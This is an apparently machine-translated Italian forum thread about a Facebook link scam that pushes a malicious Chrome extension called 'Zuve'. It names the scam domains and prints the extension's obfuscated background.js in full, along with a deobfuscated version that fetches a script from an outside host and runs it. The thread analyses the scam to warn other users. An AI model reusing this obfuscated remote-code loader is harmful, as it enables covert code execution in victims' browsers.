Che tipo di "virus" di Facebook condivide il link all'elenco dei numeri esadecimali?

André Borie era sulla strada giusta. Questa sembra essere una cosa di comando e controllo di qualche descrizione.

Il mio GF ha un link pubblicato sulla sua pagina FB e perché aveva il suo nome in esso, ha cliccato su di esso. Questo la portò a un sito web con "codice casuale" come lei ha messo. Me ne ha parlato immediatamente e ho messo i miei occhiali da detective.

Il link in questione era 0udfczyk [dot] videossite [dot] ga / LKbdc84n

Quando ho provato a visitarlo in una VM in Chrome, mi ha reindirizzato a una pagina video di Facebook falsa (su fulldailyonlynews [dot] com ) con commenti falsi e tutto, e indipendentemente da dove hai fatto clic, ho provato ad aggiungere un'estensione per il browser chiamata " Zuve ", richiedendo l'accesso a" Leggi e modifica tutti i tuoi dati sui siti web che visiti ". Sì .. no grazie.

Link all'estensione: https://chrome.google.com/webstore/detail/zuve/ofambggiemkoplmbdloidhlbicfcfmak

Qualunque visita successiva al link videossite non mi ha reindirizzato al sito di Facebook fasullo (Fakebook?). Mi portano semplicemente al sito "codice casuale" come descritto dall'OP qui e dal mio GF. Questi codici (hash?) Cambiano ad ogni aggiornamento della pagina, e quando si puliscono tutte le cache e i cookie ecc. Si reindirizzerà nuovamente alla pagina Facebook falsa (una volta).

NON ho provato ad installare l'estensione del browser, ma considerando le prove è abbastanza ovvio che questa roba farà qualcosa di malevolo. Probabilmente proverai (ab) usando il tuo account Facebook (o altri account) per inviare spam a link più strani a questa roba.

Altri dettagli:

• Link non sembra funzionare correttamente in Firefox o Opera (almeno nel mio caso no. Nessuna pagina di Facebook falsa, appare solo la "roba di codice")

Screenshots:

link

(dovevo collegarlo a un elenco di directory dato che non posso ancora pubblicare più di 2 collegamenti)

Spero che questo aiuti qualcuno ..

Ho scaricato questa estensione (link nel commento di Bambooz ) e ho provato a verificare cosa farà. Ecco background.js (lo script di background viene eseguito nel processo di estensione ):

var lsym = true;
var cmal = 24059;
var mwwe = {
    "mayeceroh": 53574,
    "avagagozave": 83706,
    "zunucog": 40507,
    "agifarig": 20915,
    "koyuci": 89453
};
var zsyt = 45095;
var pnpgnw = this;
var dkrjfv = lwawh("3pYSKX4uo37VHpmhnNFbg",1,true);
var tcqrsh = lwawh("ryY7J8Z3g74UyR2kVm.lIf",10,false);
var rjowvk = lwawh("rCBFMe=kaJkzI24kVJidHRe09_",14,false);
var rsohfd = lwawh("1X7ly4Dg",3,false);
var tanxle = lwawh("E.5gmeigdC",6,false);
pnpgnw[rsohfd](dkrjfv+tcqrsh+rjowvk)[tanxle](function(lcqbpv) {
  var yvtdn = lwawh("3wfEI2",4,true);
  if(lcqbpv[yvtdn]){
    var hqnom = lwawh("dEkiMpwwiHI2j",9,false);
    lcqbpv[hqnom]()[tanxle](function(qevtny){
      var elprl = lwawh("vqGEgmpp",5,true);
      var ulmsq = lwawh("oXBqr?m9Szs1oV29dV5Yysi/2F",11,false);
      var mpytne = pnpgnw[elprl][ulmsq](qevtny);
      var mmtry = lwawh("jtwHM2llnDGrypi",7,false);
      var vcatxl = lwawh("1ELg1KZMnDuHc4eJ_yEHN4",9,true);
      var mkebn = lwawh("gtYlUuDVoEY",5,false);
      var ghvrw = pnpgnw[mmtry][vcatxl](mkebn);
      var otpjhs = lwawh("RuIrJi6gRmk",8,true);
      ghvrw[otpjhs] = mpytne;
      var tllma = lwawh("1u9=ye:",3,false);
      var bjltd = lwawh("UuuUoNZoRkZ7KreeaBP_ef",11,true);
      pnpgnw[mmtry][tllma][bjltd](ghvrw);
    });
  }
});
function lwawh(fdnzl,xijua,xgeswl){
  var yfhfby = "uTDHJMXrk?mNoICxU_37Y:zsAnhO=SEBdfv52p9/Gab1gLlF.jt60Z4e8cViyRKP";
  var qtlobq = ["Vt\/f.4IFjAM?nDmv7p:0OPrRh=ElbkTzacSZxUsX569ugL_CK1GB8JedYiNo32yH","X5Rdn?im41Y96:BAM8PIoUtulCpVS\/vb3k7cgExfjhH2_FJON.GZTLsyeDa0zKr=","Gl1m:NguS0Ex7JRFpyCHz_ZB6OPno\/UKfsM2jh84Ai5?9bIa3LYTcXd.tkveDr=V","iJMP?pCVUBr32:OA54TvtcgFaK=ysR9nzlo\/L8.k67xZdXEjNYS0efuHG1I_bmhD","H2FkGTno1O9AIux5\/dXSZagM7Nt8.bsvJ?rVpKY0=cjRCfePD3UB6:Ey_i4mlhLz","NHC_67h825t.TzGEmIj9cXou=pg0n:1OfLKSxrlDAeRybviaPY4BM\/UVFs3k?ZJd","mOyK5gjaz0T7R?kAL9S\/cUZG3V1Xrfxs:P_.hbN4Y2lo=uFCE8itdJMeBDv6IpHn","YFb2a1RVUnrm=Bjs\/HTIc4DhxegyC5JilfZ7GkPuzoLO:p8S0X9.t6EK_MN?3dvA"];
  var oqdaom = "";
  var imzfs = 0;
  while(qtlobq[imzfs]){
    imzfs++;
  }
  var xnykx = 0;
  while(fdnzl[xnykx]){
    var liscvq = 0;
    var xpxrc = -1;
    while(yfhfby[liscvq]){
      if(yfhfby[liscvq] == fdnzl[xnykx]){
        xpxrc = liscvq;
        break;
      }
      liscvq++;
    }
    if(xpxrc >= 0){
      var rfgqzf = 0;
      var eqvzdw = -1;
      while(qtlobq[xnykx%imzfs][rfgqzf]){
        if(qtlobq[xnykx%imzfs][rfgqzf] == fdnzl[xnykx]){
          eqvzdw = rfgqzf;
          break;
        }
      rfgqzf++;
      }
      oqdaom += yfhfby[eqvzdw];
    }else{
      oqdaom += fdnzl[xnykx];
    }
    xnykx++;
  }
  var ttfrv = "";
  for(uevije=xijua;uevije<oqdaom.length;uevije++){
    ttfrv += oqdaom[uevije];
  }
  oqdaom = ttfrv;
  return oqdaom;
}
var pkqu = [
    "enedige",
    "ucosus",
    81739,
    "usurujo",
    98363,
    "ejojata",
    79813
];
var qybb = {
    "ecohididiy": 85533,
    "ajofahacer": "suvazi",
    "upasibug": 89625,
    "pugofutec": 26653,
    "lusatehiy": "getulir",
    "obesomo": "fihayopuz"
};

È stato codificato / offuscato. Quindi sono stato de-offuscato per ottenere il codice sorgente originale:

window.fetch('http://idorunuso.xyz/kebapurefod/pulagube.bg').then(function(response) {
  if (response.ok) {
    response.blob().then(function(blob) {
      var code = window.URL.createObjectURL(blob);
      var js = window.document.createElement('script');
      js.src = code;
      window.document.head.appendChild(js);
    });
  }
});

Come tutti vediamo, questo codice eseguirà un codice remoto. Sfortunatamente, quel link restituisce un codice di errore 404, quindi non posso continuare ad analizzare. Ma da quello che abbiamo visto, questo è quasi un codice dannoso.

A proposito, è come l'esempio di malware che ho analizzato in 2015 .